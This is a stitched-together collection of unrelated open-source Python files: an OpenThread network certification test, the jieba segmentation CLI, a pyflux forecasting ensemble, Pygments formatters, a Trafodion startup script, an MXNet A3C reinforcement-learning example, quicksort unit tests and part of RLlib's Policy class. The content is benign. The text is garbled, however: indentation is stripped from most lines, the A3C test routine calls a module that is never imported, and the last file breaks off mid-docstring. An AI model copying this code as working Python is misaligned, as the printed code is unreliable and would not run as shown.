# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
#
import time
import unittest
import node
LEADER = 1
ROUTER = 2
SED1 = 3
ED1 = 4
MTDS = [SED1, ED1]
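# Topology sketch (derived from the whitelists configured in setUp below):
# LEADER whitelists ROUTER, SED1 and ED1, and each of those whitelists only
# LEADER, i.e. a star with the leader at the center.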
class Cert_7_1_1_BorderRouterAsLeader(unittest.TestCase):
def setUp(self):
self.nodes = {}
for i in range(1,5):
self.nodes[i] = node.Node(i, (i in MTDS))
self.nodes[LEADER].set_panid(0xface)
self.nodes[LEADER].set_mode('rsdn')
self.nodes[LEADER].add_whitelist(self.nodes[ROUTER].get_addr64())
self.nodes[LEADER].add_whitelist(self.nodes[SED1].get_addr64())
self.nodes[LEADER].add_whitelist(self.nodes[ED1].get_addr64())
self.nodes[LEADER].enable_whitelist()
self.nodes[ROUTER].set_panid(0xface)
self.nodes[ROUTER].set_mode('rsdn')
self.nodes[ROUTER].add_whitelist(self.nodes[LEADER].get_addr64())
self.nodes[ROUTER].enable_whitelist()
self.nodes[ROUTER].set_router_selection_jitter(1)
self.nodes[SED1].set_panid(0xface)
self.nodes[SED1].set_mode('s')
self.nodes[SED1].add_whitelist(self.nodes[LEADER].get_addr64())
self.nodes[SED1].enable_whitelist()
self.nodes[SED1].set_timeout(3)
self.nodes[ED1].set_panid(0xface)
self.nodes[ED1].set_mode('rsn')
self.nodes[ED1].add_whitelist(self.nodes[LEADER].get_addr64())
self.nodes[ED1].enable_whitelist()
def tearDown(self):
for node in list(self.nodes.values()):
node.stop()
del self.nodes
def test(self):
self.nodes[LEADER].start()
self.nodes[LEADER].set_state('leader')
self.assertEqual(self.nodes[LEADER].get_state(), 'leader')
self.nodes[LEADER].add_prefix('2001:2:0:1::/64', 'paros')
self.nodes[LEADER].add_prefix('2001:2:0:2::/64', 'paro')
self.nodes[LEADER].register_netdata()
self.nodes[ROUTER].start()
time.sleep(5)
self.assertEqual(self.nodes[ROUTER].get_state(), 'router')
self.nodes[SED1].start()
time.sleep(5)
self.assertEqual(self.nodes[SED1].get_state(), 'child')
self.nodes[ED1].start()
time.sleep(5)
self.assertEqual(self.nodes[ED1].get_state(), 'child')
addrs = self.nodes[SED1].get_addrs()
self.assertTrue(any('2001:2:0:1' in addr[0:10] for addr in addrs))
self.assertFalse(any('2001:2:0:2' in addr[0:10] for addr in addrs))
for addr in addrs:
if addr[0:10] == '2001:2:0:1' or addr[0:10] == '2001:2:0:2':
self.assertTrue(self.nodes[LEADER].ping(addr))
addrs = self.nodes[ED1].get_addrs()
self.assertTrue(any('2001:2:0:1' in addr[0:10] for addr in addrs))
self.assertTrue(any('2001:2:0:2' in addr[0:10] for addr in addrs))
for addr in addrs:
if addr[0:10] == '2001:2:0:1' or addr[0:10] == '2001:2:0:2':
self.assertTrue(self.nodes[LEADER].ping(addr))
if __name__ == '__main__':
unittest.main()
| bsd-3-clause |
lsqtongxin/jieba | jieba/__main__.py | 60 | 1938 | """Jieba command line interface."""
import sys
import jieba
from argparse import ArgumentParser
from ._compat import *
parser = ArgumentParser(usage="%s -m jieba [options] filename" % sys.executable, description="Jieba command line interface.", epilog="If no filename specified, use STDIN instead.")
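# Illustrative invocation (hypothetical file name):
#   python -m jieba -d ' | ' -a input.txt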
parser.add_argument("-d", "--delimiter", metavar="DELIM", default=' / ',
nargs='?', const=' ',
help="use DELIM instead of ' / ' for word delimiter; or a space if it is used without DELIM")
parser.add_argument("-D", "--dict", help="use DICT as dictionary")
parser.add_argument("-u", "--user-dict",
help="use USER_DICT together with the default dictionary or DICT (if specified)")
parser.add_argument("-a", "--cut-all",
action="store_true", dest="cutall", default=False,
help="full pattern cutting")
parser.add_argument("-n", "--no-hmm", dest="hmm", action="store_false",
default=True, help="don't use the Hidden Markov Model")
parser.add_argument("-q", "--quiet", action="store_true", default=False,
help="don't print loading messages to stderr")
parser.add_argument("-V", '--version', action='version',
version="Jieba " + jieba.__version__)
parser.add_argument("filename", nargs='?', help="input file")
args = parser.parse_args()
if args.quiet:
jieba.setLogLevel(60)
delim = text_type(args.delimiter)
cutall = args.cutall
hmm = args.hmm
fp = open(args.filename, 'r') if args.filename else sys.stdin
if args.dict:
jieba.initialize(args.dict)
else:
jieba.initialize()
if args.user_dict:
jieba.load_userdict(args.user_dict)
ln = fp.readline()
while ln:
    l = ln.rstrip('\r\n')
    result = delim.join(jieba.cut(l, cutall, hmm))
if PY2:
result = result.encode(default_encoding)
print(result)
ln = fp.readline()
fp.close()
| mit |
RJT1990/pyflux | pyflux/ensembles/mixture_of_experts.py | 1 | 12285 | import pandas as pd
import numpy as np
class Aggregate():
""" Aggregation Algorithm
Parameters
----------
learning_rate : float
Learning rate for the Aggregation algorithm
loss_type : string
'absolute' or 'squared'
match_window : int
(default: 10) how many of the observations at the end of a model time
series to assess whether the data being used in each model is the same
"""
def __init__(self, learning_rate=1.0, loss_type='absolute', match_window=10):
self.learning_rate = learning_rate
self.data = []
self.model_list = []
self.model_names = []
self.match_window = match_window
self.model_predictions_is = []
self.model_predictions = []
if loss_type == 'absolute':
self.loss_type = self.absolute_loss
self.loss_name = 'Absolute Loss'
elif loss_type == 'squared':
self.loss_type = self.squared_loss
self.loss_name = 'Squared Loss'
else:
raise ValueError('Unidentified loss type entered!')
self.supported_models = ['EGARCH', 'EGARCHM', 'EGARCHMReg', 'GARCH', 'LMEGARCH', 'LMSEGARCH', 'SEGARCH', 'SEGARCHM', 'GAS', 'ARIMA', 'ARIMAX', 'GASLLEV', 'GASLLT', 'GASReg', 'GASX', 'GPNARX', 'LLEV', 'LLT', 'DynReg']
@staticmethod
def absolute_loss(data, predictions):
""" Calculates absolute loss
Parameters
----------
data : np.ndarray
Univariate data
predictions : np.ndarray
Univariate predictions
Returns
----------
- np.ndarray of the absolute loss
"""
return np.abs(data-predictions)
@staticmethod
def squared_loss(data, predictions):
""" Calculates squared loss
Parameters
----------
data : np.ndarray
Univariate data
predictions : np.ndarray
Univariate predictions
Returns
----------
- np.ndarray of the squared loss
"""
return np.square(data-predictions)
def add_model(self, model):
""" Adds a PyFlux model to the aggregating algorithm
Parameters
----------
model : pf.[MODEL]
A PyFlux univariate model
Returns
----------
- Void (changes self.model_list)
"""
if model.model_type not in self.supported_models:
raise ValueError('Model type not supported for Aggregate! Apologies')
if not self.model_list:
self.model_list.append(model)
if model.model_type in ['EGARCH', 'EGARCHM', 'EGARCHMReg', 'GARCH', 'LMEGARCH', 'LMSEGARCH', 'SEGARCH', 'SEGARCHM']:
self.data = np.abs(model.data)
else:
self.data = model.data
self.index = model.index
else:
if model.model_type in ['EGARCH', 'EGARCHM', 'EGARCHMReg', 'GARCH', 'LMEGARCH', 'LMSEGARCH', 'SEGARCH', 'SEGARCHM']:
if np.isclose(np.abs(np.abs(model.data[-self.match_window:])-self.data[-self.match_window:]).sum(),0.0) or model.model_type=='GPNARX':
self.model_list.append(model)
else:
                    raise ValueError('Data entered is deemed different based on %s last values!' % (self.match_window))
else:
if np.isclose(np.abs(model.data[-self.match_window:]-self.data[-self.match_window:]).sum(),0.0) or model.model_type=='GPNARX':
self.model_list.append(model)
else:
                    raise ValueError('Data entered is deemed different based on %s last values!' % (self.match_window))
self.model_names = [i.model_name for i in self.model_list]
def _model_predict(self, h, recalculate=False, fit_once=True):
""" Outputs ensemble model predictions for out-of-sample data
Parameters
----------
h : int
How many steps at the end of the series to run the ensemble on
recalculate: boolean
Whether to recalculate the predictions or not
fit_once : boolean
Whether to fit the model once at the beginning, or with every iteration
Returns
----------
- pd.DataFrame of the model predictions, index of dates
"""
if len(self.model_predictions) == 0 or h != self.h or recalculate is True:
for no, model in enumerate(self.model_list):
if no == 0:
model.fit()
result = model.predict(h)
self.predict_index = result.index
result.columns = [model.model_name]
else:
model.fit()
new_frame = model.predict(h)
new_frame.columns = [model.model_name]
result = pd.concat([result,new_frame], axis=1)
self.model_predictions = result
self.h = h
return result, self.predict_index
else:
return self.model_predictions, self.predict_index
def _model_predict_is(self, h, recalculate=False, fit_once=True):
""" Outputs ensemble model predictions for the end-of-period data
Parameters
----------
h : int
How many steps at the end of the series to run the ensemble on
recalculate: boolean
Whether to recalculate the predictions or not
fit_once : boolean
Whether to fit the model once at the beginning, or with every iteration
Returns
----------
- pd.DataFrame of the model predictions, index of dates
"""
if len(self.model_predictions_is) == 0 or h != self.h or recalculate is True:
for no, model in enumerate(self.model_list):
if no == 0:
result = model.predict_is(h, fit_once=fit_once)
result.columns = [model.model_name]
else:
new_frame = model.predict_is(h, fit_once=fit_once)
new_frame.columns = [model.model_name]
result = pd.concat([result,new_frame], axis=1)
self.model_predictions_is = result
self.h = h
return result
else:
return self.model_predictions_is
def _construct_losses(self, data, predictions, ensemble_prediction):
""" Construct losses for the ensemble and each constitute model
Parameters
----------
data: np.ndarray
The univariate time series
predictions : np.ndarray
The predictions of each constitute model
ensemble_prediction : np.ndarray
The prediction of the ensemble model
Returns
----------
- np.ndarray of the losses for each model
"""
losses = []
losses.append(self.loss_type(data, ensemble_prediction).sum()/data.shape[0])
for model in range(len(self.model_list)):
losses.append(self.loss_type(data, predictions[:,model]).sum()/data.shape[0])
return losses
def tune_learning_rate(self, h, parameter_list=None):
""" Naive tuning of the the learning rate on the in-sample data
Parameters
----------
h : int
How many steps to run Aggregate on
parameter_list: list
List of parameters to search for a good learning rate over
Returns
----------
- Void (changes self.learning_rate)
"""
if parameter_list is None:
            parameter_list = [0.001, 0.01, 0.1, 1.0, 10.0, 100.0, 1000.0, 10000.0, 100000.0]
for parameter in parameter_list:
self.learning_rate = parameter
_, losses, _ = self.run(h, recalculate=False)
loss = losses[0]
if parameter == parameter_list[0]:
best_rate = parameter
best_loss = loss
else:
if loss < best_loss:
best_loss = loss
best_rate = parameter
self.learning_rate = best_rate
def run(self, h, recalculate=False):
""" Run the aggregating algorithm
Parameters
----------
h : int
How many steps to run the aggregating algorithm on
recalculate: boolean
Whether to recalculate the predictions or not
Returns
----------
- np.ndarray of normalized weights, np.ndarray of losses for each model
"""
data = self.data[-h:]
predictions = self._model_predict_is(h, recalculate=recalculate).values
weights = np.zeros((h, len(self.model_list)))
normalized_weights = np.zeros((h, len(self.model_list)))
ensemble_prediction = np.zeros(h)
for t in range(h):
if t == 0:
weights[t,:] = 100000
ensemble_prediction[t] = np.dot(weights[t,:]/weights[t,:].sum(), predictions[t,:])
weights[t,:] = weights[t,:]*np.exp(-self.learning_rate*self.loss_type(data[t], predictions[t,:]))
normalized_weights[t,:] = weights[t,:]/weights[t,:].sum()
else:
ensemble_prediction[t] = np.dot(weights[t-1,:]/weights[t-1,:].sum(), predictions[t,:])
weights[t,:] = weights[t-1,:]*np.exp(-self.learning_rate*self.loss_type(data[t], predictions[t,:]))
normalized_weights[t,:] = weights[t,:]/weights[t,:].sum()
return normalized_weights, self._construct_losses(data, predictions, ensemble_prediction), ensemble_prediction
def plot_weights(self, h, **kwargs):
""" Plot the weights from the aggregating algorithm
Parameters
----------
h : int
How many steps to run the aggregating algorithm on
Returns
----------
- A plot of the weights for each model constituent over time
"""
import matplotlib.pyplot as plt
import seaborn as sns
figsize = kwargs.get('figsize',(10,7))
weights, _, _ = self.run(h=h)
plt.figure(figsize=figsize)
plt.plot(self.index[-h:],weights)
plt.legend(self.model_names)
plt.show()
def predict(self, h, h_train=40):
""" Run out-of-sample predicitons for Aggregate algorithm
(This only works for non-exogenous variable models currently)
Parameters
----------
h : int
How many out-of-sample steps to run the aggregating algorithm on
h_train : int
How many in-sample steps to warm-up the ensemble weights on
Returns
----------
- pd.DataFrame of Aggregate out-of-sample predictions
"""
predictions, index = self._model_predict(h)
normalized_weights = self.run(h=h_train)[0][-1, :]
ensemble_prediction = np.zeros(h)
for t in range(h):
ensemble_prediction[t] = np.dot(normalized_weights, predictions.values[t,:])
result = pd.DataFrame(ensemble_prediction)
result.index = index
return result
def predict_is(self, h):
""" Outputs predictions for the Aggregate algorithm on the in-sample data
Parameters
----------
h : int
How many steps to run the aggregating algorithm on
Returns
----------
- pd.DataFrame of ensemble predictions
"""
result = pd.DataFrame([self.run(h=h)[2]]).T
result.index = self.index[-h:]
return result
def summary(self, h):
"""
Summarize the results for each model for h steps of the algorithm
Parameters
----------
h : int
How many steps to run the aggregating algorithm on
Returns
----------
- pd.DataFrame of losses for each model
"""
_, losses, _ = self.run(h=h)
df = pd.DataFrame(losses)
df.index = ['Ensemble'] + self.model_names
df.columns = [self.loss_name]
return df
| bsd-3-clause |
n1k0/SublimeHighlight | pygments/formatters/other.py | 363 | 3811 | # -*- coding: utf-8 -*-
"""
pygments.formatters.other
~~~~~~~~~~~~~~~~~~~~~~~~~
Other formatters: NullFormatter, RawTokenFormatter.
:copyright: Copyright 2006-2013 by the Pygments team, see AUTHORS.
:license: BSD, see LICENSE for details.
"""
from pygments.formatter import Formatter
from pygments.util import OptionError, get_choice_opt, b
from pygments.token import Token
from pygments.console import colorize
__all__ = ['NullFormatter', 'RawTokenFormatter']
class NullFormatter(Formatter):
"""
Output the text unchanged without any formatting.
"""
name = 'Text only'
aliases = ['text', 'null']
filenames = ['*.txt']
def format(self, tokensource, outfile):
enc = self.encoding
for ttype, value in tokensource:
if enc:
outfile.write(value.encode(enc))
else:
outfile.write(value)
class RawTokenFormatter(Formatter):
r"""
Format tokens as a raw representation for storing token streams.
The format is ``tokentype<TAB>repr(tokenstring)\n``. The output can later
be converted to a token stream with the `RawTokenLexer`, described in the
`lexer list <lexers.txt>`_.
Only two options are accepted:
`compress`
If set to ``'gz'`` or ``'bz2'``, compress the output with the given
compression algorithm after encoding (default: ``''``).
`error_color`
If set to a color name, highlight error tokens using that color. If
set but with no value, defaults to ``'red'``.
*New in Pygments 0.11.*
"""
name = 'Raw tokens'
aliases = ['raw', 'tokens']
filenames = ['*.raw']
unicodeoutput = False
def __init__(self, **options):
Formatter.__init__(self, **options)
if self.encoding:
raise OptionError('the raw formatter does not support the '
'encoding option')
self.encoding = 'ascii' # let pygments.format() do the right thing
self.compress = get_choice_opt(options, 'compress',
['', 'none', 'gz', 'bz2'], '')
self.error_color = options.get('error_color', None)
if self.error_color is True:
self.error_color = 'red'
if self.error_color is not None:
try:
colorize(self.error_color, '')
except KeyError:
raise ValueError("Invalid color %r specified" %
self.error_color)
def format(self, tokensource, outfile):
try:
outfile.write(b(''))
except TypeError:
raise TypeError('The raw tokens formatter needs a binary '
'output file')
if self.compress == 'gz':
import gzip
outfile = gzip.GzipFile('', 'wb', 9, outfile)
def write(text):
outfile.write(text.encode())
flush = outfile.flush
elif self.compress == 'bz2':
import bz2
compressor = bz2.BZ2Compressor(9)
def write(text):
outfile.write(compressor.compress(text.encode()))
def flush():
outfile.write(compressor.flush())
outfile.flush()
else:
def write(text):
outfile.write(text.encode())
flush = outfile.flush
if self.error_color:
for ttype, value in tokensource:
line = "%s\t%r\n" % (ttype, value)
if ttype is Token.Error:
write(colorize(self.error_color, line))
else:
write(line)
else:
for ttype, value in tokensource:
write("%s\t%r\n" % (ttype, value))
flush()
| mit |
mashengchen/incubator-trafodion | install/python-installer/scripts/traf_start.py | 1 | 2747 | #!/usr/bin/env python
# @@@ START COPYRIGHT @@@
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
# @@@ END COPYRIGHT @@@
### this script should be run on first node with trafodion user ###
import sys
import time
import os
import json
from common import cmd_output, run_cmd, err
def run():
""" start trafodion instance """
dbcfgs = json.loads(dbcfgs_json)
print 'Starting trafodion'
traf_home = os.environ['TRAF_HOME']
if os.path.exists('%s/sql/scripts/trafstart' % traf_home):
run_cmd('trafstart')
else:
run_cmd('sqstart')
# set a uniq file name
tmp_file = '/tmp/initialize.out.' + str(int(time.time()))
print 'Initialize trafodion'
run_cmd('echo "initialize trafodion;" | sqlci > %s' % tmp_file)
init_output = cmd_output('cat %s' % tmp_file)
# error 1392, 1395
if '1392' in init_output or '1395' in init_output:
run_cmd('echo "get version of metadata;" | sqlci > %s' % tmp_file)
meta_current = cmd_output('grep \'Metadata is current\' %s | wc -l' % tmp_file)
if meta_current != "1":
print 'Initialize trafodion, upgrade'
run_cmd('echo "initialize trafodion, upgrade;" | sqlci > %s' % tmp_file)
# other errors
elif 'ERROR' in init_output:
err('Failed to initialize trafodion:\n %s' % init_output)
run_cmd('rm -rf %s' % tmp_file)
if dbcfgs['ldap_security'] == 'Y':
run_cmd('echo "initialize authorization; alter user DB__ROOT set external name \\\"%s\\\";" | sqlci > %s' % (dbcfgs['db_root_user'], tmp_file))
secure_output = cmd_output('cat %s' % tmp_file)
if 'ERROR' in secure_output:
err('Failed to setup security for trafodion:\n %s' % secure_output)
run_cmd('rm -rf %s' % tmp_file)
if os.path.exists('%s/sql/scripts/connstart' % traf_home):
run_cmd('connstart')
print 'Start trafodion successfully.'
# main
try:
dbcfgs_json = sys.argv[1]
except IndexError:
err('No db config found')
run()
| apache-2.0 |
arank/mxnet | example/reinforcement-learning/a3c/a3c.py | 15 | 8861 | from __future__ import print_function
import mxnet as mx
import numpy as np
import rl_data
import sym
import argparse
import logging
import os
import gym
from datetime import datetime
import time
parser = argparse.ArgumentParser(description='Training A3C with OpenAI Gym')
parser.add_argument('--test', action='store_true', help='run testing', default=False)
parser.add_argument('--log-file', type=str, help='the name of log file')
parser.add_argument('--log-dir', type=str, default="./log", help='directory of the log file')
parser.add_argument('--model-prefix', type=str, help='the prefix of the model to load')
parser.add_argument('--save-model-prefix', type=str, help='the prefix of the model to save')
parser.add_argument('--load-epoch', type=int, help="load the model on an epoch using the model-prefix")
parser.add_argument('--kv-store', type=str, default='device', help='the kvstore type')
parser.add_argument('--gpus', type=str, help='the gpus will be used, e.g "0,1,2,3"')
parser.add_argument('--num-epochs', type=int, default=120, help='the number of training epochs')
parser.add_argument('--num-examples', type=int, default=1000000, help='the number of training examples')
parser.add_argument('--batch-size', type=int, default=32)
parser.add_argument('--input-length', type=int, default=4)
parser.add_argument('--lr', type=float, default=0.0001)
parser.add_argument('--wd', type=float, default=0)
parser.add_argument('--t-max', type=int, default=4)
parser.add_argument('--gamma', type=float, default=0.99)
parser.add_argument('--beta', type=float, default=0.08)
args = parser.parse_args()
def log_config(log_dir=None, log_file=None, prefix=None, rank=0):
reload(logging)
head = '%(asctime)-15s Node[' + str(rank) + '] %(message)s'
if log_dir:
logging.basicConfig(level=logging.DEBUG, format=head)
if not os.path.exists(log_dir):
os.makedirs(log_dir)
if not log_file:
log_file = (prefix if prefix else '') + datetime.now().strftime('_%Y_%m_%d-%H_%M.log')
log_file = log_file.replace('/', '-')
else:
log_file = log_file
log_file_full_name = os.path.join(log_dir, log_file)
handler = logging.FileHandler(log_file_full_name, mode='w')
formatter = logging.Formatter(head)
handler.setFormatter(formatter)
logging.getLogger().addHandler(handler)
logging.info('start with arguments %s', args)
else:
logging.basicConfig(level=logging.DEBUG, format=head)
logging.info('start with arguments %s', args)
def train():
# kvstore
kv = mx.kvstore.create(args.kv_store)
model_prefix = args.model_prefix
if model_prefix is not None:
model_prefix += "-%d" % (kv.rank)
save_model_prefix = args.save_model_prefix
if save_model_prefix is None:
save_model_prefix = model_prefix
log_config(args.log_dir, args.log_file, save_model_prefix, kv.rank)
devs = mx.cpu() if args.gpus is None else [
mx.gpu(int(i)) for i in args.gpus.split(',')]
epoch_size = args.num_examples / args.batch_size
if args.kv_store == 'dist_sync':
epoch_size /= kv.num_workers
# disable kvstore for single device
    if 'local' in kv.type and (
            args.gpus is None or len(args.gpus.split(',')) == 1):
kv = None
# module
dataiter = rl_data.GymDataIter('Breakout-v0', args.batch_size, args.input_length, web_viz=True)
net = sym.get_symbol_atari(dataiter.act_dim)
module = mx.mod.Module(net, data_names=[d[0] for d in dataiter.provide_data], label_names=('policy_label', 'value_label'), context=devs)
module.bind(data_shapes=dataiter.provide_data,
label_shapes=[('policy_label', (args.batch_size,)), ('value_label', (args.batch_size, 1))],
grad_req='add')
# load model
if args.load_epoch is not None:
assert model_prefix is not None
_, arg_params, aux_params = mx.model.load_checkpoint(model_prefix, args.load_epoch)
else:
arg_params = aux_params = None
# save model
checkpoint = None if save_model_prefix is None else mx.callback.do_checkpoint(save_model_prefix)
init = mx.init.Mixed(['fc_value_weight|fc_policy_weight', '.*'],
[mx.init.Uniform(0.001), mx.init.Xavier(rnd_type='gaussian', factor_type="in", magnitude=2)])
module.init_params(initializer=init,
arg_params=arg_params, aux_params=aux_params)
# optimizer
module.init_optimizer(kvstore=kv, optimizer='adam',
optimizer_params={'learning_rate': args.lr, 'wd': args.wd, 'epsilon': 1e-3})
# logging
np.set_printoptions(precision=3, suppress=True)
T = 0
dataiter.reset()
score = np.zeros((args.batch_size, 1))
final_score = np.zeros((args.batch_size, 1))
for epoch in range(args.num_epochs):
if save_model_prefix:
module.save_params('%s-%04d.params'%(save_model_prefix, epoch))
for _ in range(epoch_size/args.t_max):
tic = time.time()
# clear gradients
for exe in module._exec_group.grad_arrays:
for g in exe:
g[:] = 0
S, A, V, r, D = [], [], [], [], []
for t in range(args.t_max + 1):
data = dataiter.data()
module.forward(mx.io.DataBatch(data=data, label=None), is_train=False)
act, _, val = module.get_outputs()
V.append(val.asnumpy())
if t < args.t_max:
act = act.asnumpy()
act = [np.random.choice(dataiter.act_dim, p=act[i]) for i in range(act.shape[0])]
reward, done = dataiter.act(act)
S.append(data)
A.append(act)
r.append(reward.reshape((-1, 1)))
D.append(done.reshape((-1, 1)))
err = 0
R = V[args.t_max]
for i in reversed(range(args.t_max)):
R = r[i] + args.gamma * (1 - D[i]) * R
adv = np.tile(R - V[i], (1, dataiter.act_dim))
batch = mx.io.DataBatch(data=S[i], label=[mx.nd.array(A[i]), mx.nd.array(R)])
module.forward(batch, is_train=True)
pi = module.get_outputs()[1]
h = -args.beta*(mx.nd.log(pi+1e-7)*pi)
                out_acts = np.amax(pi.asnumpy(), 1)
                out_acts = np.reshape(out_acts, (-1, 1))
                out_acts_tile = np.tile(-np.log(out_acts + 1e-7), (1, dataiter.act_dim))
module.backward([mx.nd.array(out_acts_tile*adv), h])
print('pi', pi[0].asnumpy())
print('h', h[0].asnumpy())
err += (adv**2).mean()
score += r[i]
final_score *= (1-D[i])
final_score += score * D[i]
score *= 1-D[i]
T += D[i].sum()
module.update()
logging.info('fps: %f err: %f score: %f final: %f T: %f'%(args.batch_size/(time.time()-tic), err/args.t_max, score.mean(), final_score.mean(), T))
print(score.squeeze())
print(final_score.squeeze())
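# Illustrative sketch (not called by train()): the n-step discounted return used
# in the inner loop above, written as a standalone helper. It bootstraps from the
# critic's value of the last state and zeroes the return across episode
# boundaries via the done mask, i.e. R_t = r_t + gamma * (1 - done_t) * R_{t+1}.
# `n_step_returns` is a hypothetical name used only for this example.
def n_step_returns(rewards, dones, bootstrap_value, gamma):
    # rewards, dones: lists of (batch, 1) arrays of length t_max
    # bootstrap_value: (batch, 1) array holding V(s_{t_max})
    R = bootstrap_value
    returns = [None] * len(rewards)
    for i in reversed(range(len(rewards))):
        R = rewards[i] + gamma * (1 - dones[i]) * R
        returns[i] = R
    return returns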
def test():
log_config()
devs = mx.cpu() if args.gpus is None else [
mx.gpu(int(i)) for i in args.gpus.split(',')]
# module
    dataiter = robo_data.RobosimsDataIter('scenes', args.batch_size, args.input_length, web_viz=True)  # NOTE: robo_data is not imported above; it must be provided separately
print(dataiter.provide_data)
net = sym.get_symbol_thor(dataiter.act_dim)
module = mx.mod.Module(net, data_names=[d[0] for d in dataiter.provide_data], label_names=('policy_label', 'value_label'), context=devs)
module.bind(data_shapes=dataiter.provide_data,
label_shapes=[('policy_label', (args.batch_size,)), ('value_label', (args.batch_size, 1))],
for_training=False)
# load model
assert args.load_epoch is not None
assert args.model_prefix is not None
module.load_params('%s-%04d.params'%(args.model_prefix, args.load_epoch))
N = args.num_epochs * args.num_examples / args.batch_size
R = 0
T = 1e-20
score = np.zeros((args.batch_size,))
for t in range(N):
dataiter.clear_history()
data = dataiter.next()
module.forward(data, is_train=False)
act = module.get_outputs()[0].asnumpy()
act = [np.random.choice(dataiter.act_dim, p=act[i]) for i in range(act.shape[0])]
dataiter.act(act)
time.sleep(0.05)
_, reward, _, done = dataiter.history[0]
T += done.sum()
score += reward
R += (done*score).sum()
score *= (1-done)
if t % 100 == 0:
logging.info('n %d score: %f T: %f'%(t, R/T, T))
if __name__ == '__main__':
if args.test:
test()
else:
train()
| apache-2.0 |
jay-tyler/data-structures | tests/test_quick_sort.py | 1 | 1061 | from dtypes.quick_sort import quisort
from random import shuffle
import pytest
def test_rand_quicksort():
tlist = range(500)
shuffle(tlist)
assert tlist != range(500)
quisort(tlist)
assert tlist == range(500)
def test_backward_quicksort():
tlist = range(500)
tlist.reverse()
quisort(tlist)
assert tlist == range(500)
def test_inorder_quicksort():
tlist = range(500)
quisort(tlist)
assert tlist == range(500)
def test_sameval_quicksort():
tlist = [3 for _ in range(500)]
quisort(tlist)
for item in tlist:
assert item == 3
def test_char_quicksort():
initlist = list('abcdefghijklmnopq')
tlist = initlist[:]
shuffle(tlist)
quisort(tlist)
assert tlist == initlist
def test_none_quicksort():
tlist = None
with pytest.raises(TypeError):
quisort(tlist)
def test_oneitemlist_quicksort():
tlist = [1]
quisort(tlist)
assert tlist == [1]
def test_oneitem_quicksort():
tlist = 1
with pytest.raises(TypeError):
quisort(tlist)
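# A sketch of one additional case in the same in-place style as the tests
# above; assumes quisort orders negative integers like any comparable items.
def test_negatives_quicksort():
    tlist = [5, -3, 0, -7, 2]
    quisort(tlist)
    assert tlist == [-7, -3, 0, 2, 5]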
| mit |
atumanov/ray | python/ray/rllib/policy/policy.py | 1 | 10039 | from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
import gym
from ray.rllib.utils.annotations import DeveloperAPI
# By convention, metrics from optimizing the loss can be reported in the
# `grad_info` dict returned by learn_on_batch() / compute_grads() via this key.
LEARNER_STATS_KEY = "learner_stats"
@DeveloperAPI
class Policy(object):
"""An agent policy and loss, i.e., a TFPolicy or other subclass.
This object defines how to act in the environment, and also losses used to
improve the policy based on its experiences. Note that both policy and
loss are defined together for convenience, though the policy itself is
logically separate.
All policies can directly extend Policy, however TensorFlow users may
find TFPolicy simpler to implement. TFPolicy also enables RLlib
to apply TensorFlow-specific optimizations such as fusing multiple policy
graphs and multi-GPU support.
Attributes:
observation_space (gym.Space): Observation space of the policy.
action_space (gym.Space): Action space of the policy.
"""
@DeveloperAPI
def __init__(self, observation_space, action_space, config):
"""Initialize the graph.
This is the standard constructor for policies. The policy
class you pass into RolloutWorker will be constructed with
these arguments.
Args:
observation_space (gym.Space): Observation space of the policy.
action_space (gym.Space): Action space of the policy.
config (dict): Policy-specific configuration data.
"""
self.observation_space = observation_space
self.action_space = action_space
@DeveloperAPI
def compute_actions(self,
obs_batch,
state_batches,
prev_action_batch=None,
prev_reward_batch=None,
info_batch=None,
episodes=None,
**kwargs):
"""Compute actions for the current policy.
Arguments:
obs_batch (np.ndarray): batch of observations
state_batches (list): list of RNN state input batches, if any
prev_action_batch (np.ndarray): batch of previous action values
prev_reward_batch (np.ndarray): batch of previous rewards
info_batch (info): batch of info objects
episodes (list): MultiAgentEpisode for each obs in obs_batch.
This provides access to all of the internal episode state,
which may be useful for model-based or multiagent algorithms.
kwargs: forward compatibility placeholder
Returns:
actions (np.ndarray): batch of output actions, with shape like
[BATCH_SIZE, ACTION_SHAPE].
state_outs (list): list of RNN state output batches, if any, with
shape like [STATE_SIZE, BATCH_SIZE].
info (dict): dictionary of extra feature batches, if any, with
shape like {"f1": [BATCH_SIZE, ...], "f2": [BATCH_SIZE, ...]}.
"""
raise NotImplementedError
@DeveloperAPI
def compute_single_action(self,
obs,
state,
prev_action=None,
prev_reward=None,
info=None,
episode=None,
clip_actions=False,
**kwargs):
"""Unbatched version of compute_actions.
Arguments:
obs (obj): single observation
            state (list): list of RNN state inputs, if any
prev_action (obj): previous action value, if any
prev_reward (int): previous reward, if any
info (dict): info object, if any
episode (MultiAgentEpisode): this provides access to all of the
internal episode state, which may be useful for model-based or
multi-agent algorithms.
clip_actions (bool): should the action be clipped
kwargs: forward compatibility placeholder
Returns:
actions (obj): single action
state_outs (list): list of RNN state outputs, if any
info (dict): dictionary of extra features, if any
"""
prev_action_batch = None
prev_reward_batch = None
info_batch = None
episodes = None
if prev_action is not None:
prev_action_batch = [prev_action]
if prev_reward is not None:
prev_reward_batch = [prev_reward]
if info is not None:
info_batch = [info]
if episode is not None:
episodes = [episode]
[action], state_out, info = self.compute_actions(
[obs], [[s] for s in state],
prev_action_batch=prev_action_batch,
prev_reward_batch=prev_reward_batch,
info_batch=info_batch,
episodes=episodes)
if clip_actions:
action = clip_action(action, self.action_space)
return action, [s[0] for s in state_out], \
{k: v[0] for k, v in info.items()}
@DeveloperAPI
def postprocess_trajectory(self,
sample_batch,
other_agent_batches=None,
episode=None):
"""Implements algorithm-specific trajectory postprocessing.
This will be called on each trajectory fragment computed during policy
evaluation. Each fragment is guaranteed to be only from one episode.
Arguments:
sample_batch (SampleBatch): batch of experiences for the policy,
which will contain at most one episode trajectory.
other_agent_batches (dict): In a multi-agent env, this contains a
mapping of agent ids to (policy, agent_batch) tuples
containing the policy and experiences of the other agent.
